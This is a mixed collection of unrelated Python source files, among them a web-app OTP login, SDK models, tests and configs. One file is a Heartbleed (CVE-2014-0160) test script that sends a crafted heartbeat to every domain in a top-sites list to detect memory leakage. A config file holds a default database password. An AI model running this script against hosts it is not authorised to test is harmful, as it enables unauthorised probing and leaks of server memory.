'application_year': myapp.APPLICATION_YEAR,
'learning_association': learning_association,
'learning_associations': learning_associations
}
template = JINJA_ENVIRONMENT.get_template('admin_form.html')
self.response.write(template.render(template_values))
def post(self):
if self.request.get('sf'):
is_new, sf_id = self.get_params()
learning_association = is_new and LearningAssociation() or LearningAssociation.get_by_id(sf_id)
if learning_association:
learning_association.name = self.request.get('name')
learning_association.email = self.request.get('email')
learning_association.active = self.request.get('active') == 'true'
learning_association.put()
self.redirect('/admin')
def get_otp_by_token(token, fresh=False):
q = Otp.query(ndb.AND(Otp.token == token, Otp.valid_until > datetime.datetime.now()))
if fresh:
q = q.filter(Otp.is_signed_in == False)
return q.get()
class PrioritizeHandler(webapp2.RequestHandler):
__scope = None
__locked = True
def dispatch(self):
self.__scope = None
auth_token = self.request.cookies.get('auth_token')
if users.is_current_user_admin():
self.__locked = False
if self.request.get('logg_ut') == 'true':
self.redirect(users.create_logout_url('/prioriter'))
else:
self.__scope = TravelGrantsApplication.query(TravelGrantsApplication.application_year == myapp.APPLICATION_YEAR)
elif auth_token:
self.__locked = myapp.time_locked(11, 29, 5)
auth_token = SHA256.new(auth_token).hexdigest()
if self.request.get('logg_ut') == 'true':
ndb.delete_multi_async(Otp.query(ndb.OR(Otp.token==auth_token, Otp.valid_until<datetime.datetime.now())).fetch(options=ndb.QueryOptions(keys_only=True)))
self.response.delete_cookie('auth_token')
self.redirect('/prioriter')
else:
otp = get_otp_by_token(auth_token)
if otp:
self.__scope = TravelGrantsApplication.query(ndb.AND(TravelGrantsApplication.learning_association == otp.learning_association, TravelGrantsApplication.application_year == myapp.APPLICATION_YEAR))
otp.put() # Refresh expiration
super(PrioritizeHandler, self).dispatch()
def get(self):
if self.__scope:
prioritized_grants_applications = self.__scope.filter(TravelGrantsApplication.priority > 0).order(TravelGrantsApplication.priority).fetch()
grants_applications = self.__scope.filter(TravelGrantsApplication.priority < 1).order(TravelGrantsApplication.priority, TravelGrantsApplication.sent_at).fetch()
template_values = {
'application_year': myapp.APPLICATION_YEAR,
'grants_applications': grants_applications,
'prioritized_grants_applications': prioritized_grants_applications,
'TZONE': myapp.TZONE,
'UTC': myapp.UTC,
'is_admin': users.is_current_user_admin(),
'is_locked': self.__locked
}
if self.request.get('print') == 'true':
template = JINJA_ENVIRONMENT.get_template('prints.html')
else:
template = JINJA_ENVIRONMENT.get_template('prioritize.html')
self.response.write(template.render(template_values))
else:
template_values = {
'application_year': myapp.APPLICATION_YEAR,
'learning_associations': LearningAssociation.query().order(LearningAssociation.name).fetch(50)
}
template = JINJA_ENVIRONMENT.get_template('login.html')
self.response.write(template.render(template_values))
def post(self):
if self.__locked:
self.abort(403)
else:
item = self.__scope.filter(TravelGrantsApplication.key==ndb.Key(urlsafe=self.request.POST.get('grants_application'))).get()
if item:
if self.request.POST.get('priority').isdigit():
item.priority = int(self.request.POST.get('priority'))
elif self.request.POST.get('priority') == 'nil':
del item.priority
else:
self.abort(400)
item.put()
time.sleep(0.3)
self.redirect('/prioriter')
else:
self.abort(403)
class OtpHandler(webapp2.RequestHandler):
def post(self):
otp = Otp()
otp.learning_association = ndb.Key(urlsafe=self.request.POST.get('sf'))
otp_token = SHA256.new(str(otp.learning_association.id()) + ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(30))).hexdigest()
otp.token = SHA256.new(otp_token).hexdigest()
learning_association = otp.learning_association.get()
if learning_association:
otp.put()
mail.send_mail(sender="Voksenopplæringsforbundet <vofo@vofo.no>",
to="%s <%s>" % (learning_association.name, learning_association.email),
subject="Engangspassord til reisestipendsøknader",
body="""
Hei
For å logge inn til reisestipendsøknadene, bruk denne lenken:
%sotp/%s
Lenken er gyldig i en time.
Hilsen Voksenopplæringsforbundet
""" % (myapp.APPLICATION_URL, otp_token))
template_values = {
'application_year': myapp.APPLICATION_YEAR,
'learning_association': learning_association
}
template = JINJA_ENVIRONMENT.get_template('login_sent.html')
self.response.write(template.render(template_values))
else:
self.abort(400)
def get(self, token):
auth_token = SHA256.new(token).hexdigest()
otp = get_otp_by_token(auth_token, fresh=True)
if otp:
otp.is_signed_in = True
otp.put()
self.response.set_cookie('auth_token', token, expires=datetime.datetime.now() + datetime.timedelta(hours=6), secure=True)
self.redirect('/prioriter')
else:
template_values = {
'application_year': myapp.APPLICATION_YEAR
}
template = JINJA_ENVIRONMENT.get_template('login_failed.html')
self.response.write(template.render(template_values))
| vofo-no/reisestipend | myapp/views.py | Python | mit | 13,319 |
#!/usr/bin/env python
"""
Copyright 2012 GroupDocs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class ChangesResponse:
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually."""
def __init__(self):
self.swaggerTypes = {
'result': 'ChangesResult',
'status': 'str',
'error_message': 'str',
'composedOn': 'int'
}
self.result = None # ChangesResult
self.status = None # str
self.error_message = None # str
self.composedOn = None # int
| liosha2007/temporary-groupdocs-python3-sdk | groupdocs/models/ChangesResponse.py | Python | apache-2.0 | 1,137 |
#
# Candelabra
#
# Copyright Alvaro Saurin 2013 - All right Reserved
#
from logging import getLogger
from candelabra.plugins import CommandPlugin
from candelabra.boxes import boxes_storage_factory
from candelabra.errors import ImportException
logger = getLogger(__name__)
class ImportCommandPlugin(CommandPlugin):
NAME = 'import'
DESCRIPTION = "import a box from a file/URL."
def argparser(self, parser):
""" Parse arguments
"""
parser.add_argument('--input-format',
                            type=str,  # argparse 'type' must be callable; basestring cannot be instantiated
dest='box_format',
default=None,
help='input format for the image')
parser.add_argument('-n',
'--name',
dest='box_name',
default=None,
type=str,
help='the box name')
parser.add_argument('--url',
dest='box_url',
default=None,
type=str,
help='a URL where the input image/box is imported from')
def run(self, args, command):
""" Run the command
"""
logger.info('running command "%s"', command)
boxes_storage = boxes_storage_factory()
if args.box_name is None:
raise ImportException('no name provided for the box')
if boxes_storage.has_box(args.box_name):
raise ImportException('there is already a box called "%s"', args.box_name)
if args.box_url is None:
raise ImportException('no URL provided for importing the box "%s"', args.box_name)
box = boxes_storage.get_box(name=args.box_name, url=args.box_url)
box.do_download()
command = ImportCommandPlugin()
| inercia/candelabra | candelabra/command/import/command.py | Python | bsd-2-clause | 1,875 |
# -*- coding: utf-8 -*-
import sqlalchemy
POOL_SIZE = 128
MYSQL_DEFAULT_CONFIGS = {
'user': 'wiki_bot',
'pass': '31415',
'host': 'localhost',
'port': '3306',
'database': 'wiki_ua',
}
def create_engine(configs=None):
configs = configs or MYSQL_DEFAULT_CONFIGS
url = u'mysql+pymysql://{user}:{pass}@{host}:{port}/' \
u'{database}?charset=utf8&use_unicode=1'.format(**configs)
return sqlalchemy.create_engine(url, pool_size=POOL_SIZE)
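# Illustrative usage sketch (not part of the original module; the host and
# database values below are hypothetical). create_engine(None) falls back to
# MYSQL_DEFAULT_CONFIGS; a partial override must be merged by the caller:
#
#     custom = dict(MYSQL_DEFAULT_CONFIGS, host='127.0.0.1', database='wiki_en')
#     engine = create_engine(custom)
#     connection = engine.connect()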
| Lamzin/wiki-parser | wiki_parser/configs/db.py | Python | gpl-3.0 | 481 |
from django.conf import settings
import elasticsearch
from django.core.exceptions import ImproperlyConfigured
import json
from tastypie.exceptions import BadRequest
try:
ES_PREFIX = settings.ES_PREFIX
except AttributeError:
raise ImproperlyConfigured(
"You must set the index prefix for cbh datastore")
ES_MAIN_INDEX_NAME = "cbh_datastore_index"
def get_attachment_index_name(aid):
return "%s__temp_attachment_sheet__%d" % (ES_PREFIX, aid)
def get_index_name():
return ES_PREFIX + "__" + ES_MAIN_INDEX_NAME
def delete_main_index():
es = elasticsearch.Elasticsearch()
es.indices.delete(get_index_name(), ignore=[400, 404])
def get_client():
es = elasticsearch.Elasticsearch()
return es
def index_datapoint_classification(data, index_name=get_index_name(), refresh=True, decode_json=True):
if decode_json:
data = json.loads(data)
batches = [data]
if data.get("objects", "False") != "False":
batches = data["objects"]
es = elasticsearch.Elasticsearch(timeout=60)
store_type = "niofs"
create_body = {
"settings": {
"index.store.type": store_type
},
"mappings": {
"_default_": {
"_all": {"enabled": True},
"_source": {
"excludes": [
"*.project_data_all",
]
},
"dynamic_templates": [
{
"string_fields": {
"match": "*",
"match_mapping_type": "string",
"mapping": {
"type": "string", "store": "no", "index_options": "docs", "index": "analyzed",
"omit_norms": True,
"fields": {
"raw": {"type": "string", "store": "no", "index": "not_analyzed",
"ignore_above": 256}
}
}
}
}
]
}
}
}
es.indices.create(
index_name,
body=create_body,
ignore=400)
bulk_items = []
if len(batches) > 0:
for item in batches:
bulk_items.append({
"index":
{
"_id": str(item["id"]),
"_index": index_name,
"_type": "data_point_classifications"
}
})
bulk_items.append(item)
data = es.bulk(body=bulk_items, refresh=refresh)
if data["errors"]:
raise BadRequest(data)
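# Illustrative usage sketch (not part of the original module; the payload below
# is hypothetical and a reachable local Elasticsearch node is assumed). With
# decode_json=True the function takes a JSON string holding either a single
# document or a batch under an "objects" key:
#
#     payload = json.dumps({"objects": [{"id": 1, "project": "demo"}]})
#     index_datapoint_classification(payload)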
| thesgc/cbh_datastore_ws | cbh_datastore_ws/elasticsearch_client.py | Python | mit | 2,821 |
# Copyright (C) 2019 Philipp Hörist <philipp AT hoerist.com>
#
# This file is part of nbxmpp.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; If not, see <http://www.gnu.org/licenses/>.
from nbxmpp.namespaces import Namespace
from nbxmpp.protocol import Iq
from nbxmpp.structs import HTTPUploadData
from nbxmpp.errors import HTTPUploadStanzaError
from nbxmpp.errors import MalformedStanzaError
from nbxmpp.task import iq_request_task
from nbxmpp.modules.base import BaseModule
ALLOWED_HEADERS = ['Authorization', 'Cookie', 'Expires']
class HTTPUpload(BaseModule):
def __init__(self, client):
BaseModule.__init__(self, client)
self._client = client
self.handlers = []
@iq_request_task
def request_slot(self, jid, filename, size, content_type):
_task = yield
response = yield _make_request(jid, filename, size, content_type)
if response.isError():
raise HTTPUploadStanzaError(response)
slot = response.getTag('slot', namespace=Namespace.HTTPUPLOAD_0)
if slot is None:
raise MalformedStanzaError('slot node missing', response)
put_uri = slot.getTagAttr('put', 'url')
if put_uri is None:
raise MalformedStanzaError('put uri missing', response)
get_uri = slot.getTagAttr('get', 'url')
if get_uri is None:
raise MalformedStanzaError('get uri missing', response)
headers = {}
for header in slot.getTag('put').getTags('header'):
name = header.getAttr('name')
if name not in ALLOWED_HEADERS:
raise MalformedStanzaError(
'not allowed header found: %s' % name, response)
data = header.getData()
if '\n' in data:
raise MalformedStanzaError(
'newline in header data found', response)
headers[name] = data
yield HTTPUploadData(put_uri=put_uri,
get_uri=get_uri,
headers=headers)
def _make_request(jid, filename, size, content_type):
iq = Iq(typ='get', to=jid)
attr = {'filename': filename,
'size': size,
'content-type': content_type}
iq.setTag(name="request",
namespace=Namespace.HTTPUPLOAD_0,
attrs=attr)
return iq
| gajim/python-nbxmpp | nbxmpp/modules/http_upload.py | Python | gpl-3.0 | 2,899 |
# Copyright (c) 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This stuff can't live in test/unit/__init__.py due to its swob dependency.
from copy import deepcopy
from hashlib import md5
from swift.common import swob
from swift.common.utils import split_path
from test.unit import FakeLogger, FakeRing
class FakeSwift(object):
"""
A good-enough fake Swift proxy server to use in testing middleware.
"""
def __init__(self):
self._calls = []
self.req_method_paths = []
self.swift_sources = []
self.uploaded = {}
# mapping of (method, path) --> (response class, headers, body)
self._responses = {}
self.logger = FakeLogger('fake-swift')
self.account_ring = FakeRing()
self.container_ring = FakeRing()
self.get_object_ring = lambda policy_index: FakeRing()
def _get_response(self, method, path):
resp = self._responses[(method, path)]
if isinstance(resp, list):
try:
resp = resp.pop(0)
except IndexError:
raise IndexError("Didn't find any more %r "
"in allowed responses" % (
(method, path),))
return resp
def __call__(self, env, start_response):
method = env['REQUEST_METHOD']
path = env['PATH_INFO']
_, acc, cont, obj = split_path(env['PATH_INFO'], 0, 4,
rest_with_last=True)
if env.get('QUERY_STRING'):
path += '?' + env['QUERY_STRING']
if 'swift.authorize' in env:
resp = env['swift.authorize']()
if resp:
return resp(env, start_response)
req_headers = swob.Request(env).headers
self.swift_sources.append(env.get('swift.source'))
try:
resp_class, raw_headers, body = self._get_response(method, path)
headers = swob.HeaderKeyDict(raw_headers)
except KeyError:
if (env.get('QUERY_STRING')
and (method, env['PATH_INFO']) in self._responses):
resp_class, raw_headers, body = self._get_response(
method, env['PATH_INFO'])
headers = swob.HeaderKeyDict(raw_headers)
elif method == 'HEAD' and ('GET', path) in self._responses:
resp_class, raw_headers, body = self._get_response('GET', path)
body = None
headers = swob.HeaderKeyDict(raw_headers)
elif method == 'GET' and obj and path in self.uploaded:
resp_class = swob.HTTPOk
headers, body = self.uploaded[path]
else:
raise KeyError("Didn't find %r in allowed responses" % (
(method, path),))
self._calls.append((method, path, req_headers))
# simulate object PUT
if method == 'PUT' and obj:
input = env['wsgi.input'].read()
etag = md5(input).hexdigest()
headers.setdefault('Etag', etag)
headers.setdefault('Content-Length', len(input))
# keep it for subsequent GET requests later
self.uploaded[path] = (deepcopy(headers), input)
if "CONTENT_TYPE" in env:
self.uploaded[path][0]['Content-Type'] = env["CONTENT_TYPE"]
# range requests ought to work, hence conditional_response=True
req = swob.Request(env)
resp = resp_class(req=req, headers=headers, body=body,
conditional_response=True)
return resp(env, start_response)
@property
def calls(self):
return [(method, path) for method, path, headers in self._calls]
@property
def headers(self):
return [headers for method, path, headers in self._calls]
@property
def calls_with_headers(self):
return self._calls
@property
def call_count(self):
return len(self._calls)
def register(self, method, path, response_class, headers, body=''):
self._responses[(method, path)] = (response_class, headers, body)
def register_responses(self, method, path, responses):
self._responses[(method, path)] = list(responses)
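# Illustrative usage sketch (not part of the original module): register a
# canned response, drive the fake through swob and inspect the recorded calls.
#
#     app = FakeSwift()
#     app.register('GET', '/v1/a/c/o', swob.HTTPOk,
#                  {'Content-Type': 'text/plain'}, body='hello')
#     resp = swob.Request.blank('/v1/a/c/o').get_response(app)
#     assert resp.status_int == 200 and resp.body == 'hello'
#     assert app.calls == [('GET', '/v1/a/c/o')]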
| kalrey/swift | test/unit/common/middleware/helpers.py | Python | apache-2.0 | 4,791 |
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Quickly and dirtily modified by Mustafa Al-Bassam (mus@musalbas.com) to test
# the Alexa top X.
# Usage example: python ssltest.py top-1m.csv 10
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog file max', description='Test for SSL heartbleed vulnerability (CVE-2014-0160) on multiple domains, takes in Alexa top X CSV file')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b: b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.') for c in lin)
#print ' %04x: %-48s %s' % (b, hxdat, pdat)
#print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
try:
data = s.recv(remain)
except Exception, e:
return None
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
#print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
#print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
#print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
#print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
#print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
#print 'WARNING: server returned more data than it should - server is vulnerable!'
return True
else:
#print 'Server processed malformed heartbeat, but did not return any extra data.'
return False
if typ == 21:
#print 'Received alert:'
hexdump(pay)
#print 'Server returned error, likely not vulnerable'
return False
def is_vulnerable(domain):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
#print 'Connecting...'
#sys.stdout.flush()
try:
s.connect((domain, 443))
except Exception, e:
return None
#print 'Sending Client Hello...'
#sys.stdout.flush()
s.send(hello)
#print 'Waiting for Server Hello...'
#sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
#print 'Server closed connection without sending Server Hello.'
return None
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
#print 'Sending heartbeat request...'
#sys.stdout.flush()
s.send(hb)
return hit_hb(s)
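# Illustrative usage sketch (not part of the original script): probe a single
# host instead of an Alexa CSV; is_vulnerable() returns True, False, or None
# (no SSL / connection failure).
#
#     print "example.com:", is_vulnerable("example.com")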
def main():
opts, args = options.parse_args()
if len(args) < 2:
options.print_help()
return
counter_nossl = 0
counter_notvuln = 0
counter_vuln = 0
f = open(args[0], 'r')
for line in f:
rank, domain = line.split(',')
domain = domain.strip()
print "Testing " + domain + "... ",
sys.stdout.flush()
result = is_vulnerable(domain)
if result is None:
print "no SSL."
counter_nossl += 1
elif result:
print "vulnerable."
counter_vuln += 1
else:
print "not vulnerable."
counter_notvuln += 1
if int(rank) >= int(args[1]):
break
print
print "No SSL: " + str(counter_nossl)
print "Vulnerable: " + str(counter_vuln)
print "Not vulnerable: " + str(counter_notvuln)
if __name__ == '__main__':
main()
| 1n/heartbleed-masstest | ssltest.py | Python | cc0-1.0 | 5,278 |
# -----------------------------------------------------------------------------
# Copyright (c) 2014--, The Qiita Development Team.
#
# Distributed under the terms of the BSD 3-clause License.
#
# The full license is in the file LICENSE, distributed with this software.
# -----------------------------------------------------------------------------
from unittest import main, TestCase
from json import loads
from functools import partial
from os.path import join
from tornado.web import HTTPError
from qiita_db.handlers.tests.oauthbase import OauthTestingBase
import qiita_db as qdb
from qiita_db.handlers.reference import _get_reference
class UtilTests(TestCase):
def test_get_reference(self):
with self.assertRaises(HTTPError):
_get_reference(100)
obs = _get_reference(1)
self.assertEqual(obs, qdb.reference.Reference(1))
class ReferenceFilepathsHandler(OauthTestingBase):
def test_get_reference_no_header(self):
obs = self.get('/qiita_db/references/1/filepaths/')
self.assertEqual(obs.code, 400)
def test_get_reference_does_not_exist(self):
obs = self.get('/qiita_db/references/100/filepaths/',
headers=self.header)
self.assertEqual(obs.code, 404)
def test_get(self):
obs = self.get('/qiita_db/references/1/filepaths/',
headers=self.header)
self.assertEqual(obs.code, 200)
db_test_raw_dir = qdb.util.get_mountpoint('reference')[0][1]
path_builder = partial(join, db_test_raw_dir)
exp_fps = [
[path_builder("GreenGenes_13_8_97_otus.fasta"), "reference_seqs"],
[path_builder("GreenGenes_13_8_97_otu_taxonomy.txt"),
"reference_tax"],
[path_builder("GreenGenes_13_8_97_otus.tree"), "reference_tree"]]
exp = {'filepaths': exp_fps}
self.assertEqual(loads(obs.body), exp)
if __name__ == '__main__':
main()
| squirrelo/qiita | qiita_db/handlers/tests/test_reference.py | Python | bsd-3-clause | 1,953 |
"""State API tests.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import json
import zlib
import mock
import treadmill.utils
from treadmill.api import state
def _create_zkclient_mock(placement_data):
data_watch_mock = mock.Mock(
side_effect=lambda func: func(placement_data, None, None)
)
zkclient_mock = mock.Mock()
zkclient_mock.DataWatch.return_value = data_watch_mock
return zkclient_mock
class ApiStateTest(unittest.TestCase):
"""treadmill.api.state tests."""
def setUp(self):
self.cell_state = state.CellState()
self.cell_state.scheduled = set(['foo.bar#0000000001'])
self.cell_state.running = set(['foo.bar#0000000001'])
self.cell_state.placement = {
'foo.bar#0000000001': {
'expires': 1234567890.1, 'host': 'baz1'
}
}
self.cell_state.finished = {
'foo.bar#0000000002': {
'data': '0.0', 'host': 'baz1',
'when': '123456789.2', 'state': 'finished'
},
'foo.bar#0000000003': {
'data': '255.0', 'host': 'baz1',
'when': '123456789.3', 'state': 'finished'
},
'foo.bar#0000000004': {
'data': '256.11', 'host': 'baz1',
'when': '1234567890.4', 'state': 'finished'
},
'foo.bar#0000000005': {
'data': 'oom', 'host': 'baz2',
'when': '1234567890.5', 'state': 'killed'
},
'foo.bar#0000000006': {
'data': None, 'host': 'baz2',
'when': 1234567890.6, 'state': 'terminated'
},
'foo.bar#0000000007': {
'data': 'TypeError', 'host': 'baz2',
'when': '1234567890.7', 'state': 'aborted'
}
}
# Disable the exit on exception hack for tests
self.old_exit_on_unhandled = treadmill.utils.exit_on_unhandled
treadmill.utils.exit_on_unhandled = mock.Mock(side_effect=lambda x: x)
def tearDown(self):
# Restore the exit on exception hack for tests
treadmill.utils.exit_on_unhandled = self.old_exit_on_unhandled
@mock.patch('treadmill.context.GLOBAL', mock.Mock())
@mock.patch('treadmill.api.state.watch_running', mock.Mock())
@mock.patch('treadmill.api.state.watch_placement', mock.Mock())
@mock.patch('treadmill.api.state.watch_finished', mock.Mock())
@mock.patch('treadmill.api.state.watch_finished_history', mock.Mock())
@mock.patch('treadmill.api.state.CellState')
def test_get(self, cell_state_cls_mock):
"""Tests for treadmill.api.state.get()"""
cell_state_cls_mock.return_value = self.cell_state
state_api = state.API()
self.assertEqual(
state_api.get('foo.bar#0000000001'),
{'host': 'baz1', 'state': 'running',
'expires': 1234567890.1, 'name': 'foo.bar#0000000001'}
)
self.assertEqual(
state_api.get('foo.bar#0000000002'),
{'host': 'baz1', 'name': 'foo.bar#0000000002', 'oom': False,
'when': '123456789.2', 'state': 'finished', 'exitcode': 0}
)
self.assertEqual(
state_api.get('foo.bar#0000000003'),
{'host': 'baz1', 'name': 'foo.bar#0000000003', 'oom': False,
'when': '123456789.3', 'state': 'finished', 'exitcode': 255}
)
self.assertEqual(
state_api.get('foo.bar#0000000004'),
{'host': 'baz1', 'name': 'foo.bar#0000000004', 'oom': False,
'signal': 11, 'when': '1234567890.4', 'state': 'finished'}
)
self.assertEqual(
state_api.get('foo.bar#0000000005'),
{'oom': True, 'host': 'baz2', 'when': '1234567890.5',
'name': 'foo.bar#0000000005', 'state': 'killed'}
)
self.assertEqual(
state_api.get('foo.bar#0000000006'),
{'oom': False, 'host': 'baz2', 'when': 1234567890.6,
'name': 'foo.bar#0000000006', 'state': 'terminated'}
)
self.assertEqual(
state_api.get('foo.bar#0000000007'),
{'oom': False, 'host': 'baz2', 'when': '1234567890.7',
'name': 'foo.bar#0000000007', 'state': 'aborted',
'aborted_reason': 'TypeError'}
)
@mock.patch('treadmill.context.GLOBAL', mock.Mock())
@mock.patch('treadmill.api.state.watch_running', mock.Mock())
@mock.patch('treadmill.api.state.watch_placement', mock.Mock())
@mock.patch('treadmill.api.state.watch_finished', mock.Mock())
@mock.patch('treadmill.api.state.watch_finished_history', mock.Mock())
@mock.patch('treadmill.api.state.CellState')
def test_list(self, cell_state_cls_mock):
"""Tests for treadmill.api.state.list()"""
cell_state_cls_mock.return_value = self.cell_state
state_api = state.API()
self.assertEqual(
state_api.list(),
[
{'host': 'baz1', 'state': 'running',
'name': 'foo.bar#0000000001', 'expires': 1234567890.1}
]
)
self.assertEqual(
state_api.list('foo.bar#000000000[12]', True),
[
{'host': 'baz1', 'state': 'running',
'name': 'foo.bar#0000000001', 'expires': 1234567890.1},
{'host': 'baz1', 'name': 'foo.bar#0000000002', 'oom': False,
'when': '123456789.2', 'state': 'finished', 'exitcode': 0}
]
)
@mock.patch('treadmill.context.AdminContext.server')
@mock.patch('treadmill.context.Context.cell', mock.Mock())
@mock.patch('treadmill.context.Context.zk', mock.Mock())
@mock.patch('treadmill.api.state.watch_running', mock.Mock())
@mock.patch('treadmill.api.state.watch_placement', mock.Mock())
@mock.patch('treadmill.api.state.watch_finished', mock.Mock())
@mock.patch('treadmill.api.state.watch_finished_history', mock.Mock())
@mock.patch('treadmill.api.state.CellState')
def test_list_partition(self, cell_state_cls_mock, server_factory):
"""Tests for treadmill.api.state.list() with partition"""
cell_state_cls_mock.return_value = self.cell_state
admin_srv = server_factory.return_value
admin_srv.list.return_value = [
{'cell': 'x', 'traits': [], '_id': 'baz1', 'partition': 'part1'},
{'cell': 'x', 'traits': [], '_id': 'baz2', 'partition': 'part2'}
]
state_api = state.API()
self.assertEqual(
state_api.list('foo.bar#000000000[1234567]', True, 'part1'),
[
{'host': 'baz1', 'state': 'running',
'name': 'foo.bar#0000000001', 'expires': 1234567890.1},
{'host': 'baz1', 'name': 'foo.bar#0000000002', 'oom': False,
'when': '123456789.2', 'state': 'finished', 'exitcode': 0},
{'host': 'baz1', 'name': 'foo.bar#0000000003', 'oom': False,
'when': '123456789.3', 'state': 'finished', 'exitcode': 255},
{'host': 'baz1', 'name': 'foo.bar#0000000004', 'oom': False,
'signal': 11, 'when': '1234567890.4', 'state': 'finished'}
]
)
def test_watch_placement(self):
"""Test loading placement.
"""
cell_state = state.CellState()
cell_state.running = ['foo.bar#0000000001']
zkclient_mock = _create_zkclient_mock(
zlib.compress(
json.dumps([
[
'foo.bar#0000000001',
'baz', 12345.67890,
'baz', 12345.67890
],
[
'foo.bar#0000000002',
'baz', 12345.67890,
'baz', 12345.67890
],
[
'foo.bar#0000000003',
None, None,
None, None
],
]).encode() # compress needs bytes
)
)
state.watch_placement(zkclient_mock, cell_state)
self.assertEqual(
cell_state.placement,
{
'foo.bar#0000000001': {
'expires': 12345.6789, 'host': 'baz'
},
'foo.bar#0000000002': {
'expires': 12345.6789, 'host': 'baz'
},
}
)
if __name__ == '__main__':
unittest.main()
| Morgan-Stanley/treadmill | lib/python/treadmill/tests/api/state_test.py | Python | apache-2.0 | 8,703 |
"""
Init file.
"""
from flask import Flask
import flask.ext.uploads as uploads
flask_app = Flask(__name__)
flask_app.config.from_object('app.config')
flask_app.config.from_envvar('FLASKR_SETTINGS', silent = True)
files_uploads = uploads.UploadSet(extensions = uploads.ALL)
uploads.configure_uploads(flask_app, files_uploads)
from app import views, logger
| rubikonx9/valvis | app/__init__.py | Python | gpl-2.0 | 361 |
# $Id$
#
# pjsua2 Setup script.
#
# Copyright (C)2012 Teluu Inc. (http://www.teluu.com)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
from distutils.core import setup, Extension
import os
import sys
import platform
# find pjsip version
pj_version=""
pj_version_major=""
pj_version_minor=""
pj_version_rev=""
pj_version_suffix=""
f = open('../../../../version.mak', 'r')
for line in f:
if line.find("export PJ_VERSION_MAJOR") != -1:
tokens=line.split("=")
if len(tokens)>1:
pj_version_major= tokens[1].strip()
elif line.find("export PJ_VERSION_MINOR") != -1:
tokens=line.split("=")
if len(tokens)>1:
pj_version_minor= line.split("=")[1].strip()
elif line.find("export PJ_VERSION_REV") != -1:
tokens=line.split("=")
if len(tokens)>1:
pj_version_rev= line.split("=")[1].strip()
elif line.find("export PJ_VERSION_SUFFIX") != -1:
tokens=line.split("=")
if len(tokens)>1:
pj_version_suffix= line.split("=")[1].strip()
f.close()
if not pj_version_major:
print 'Unable to get PJ_VERSION_MAJOR'
sys.exit(1)
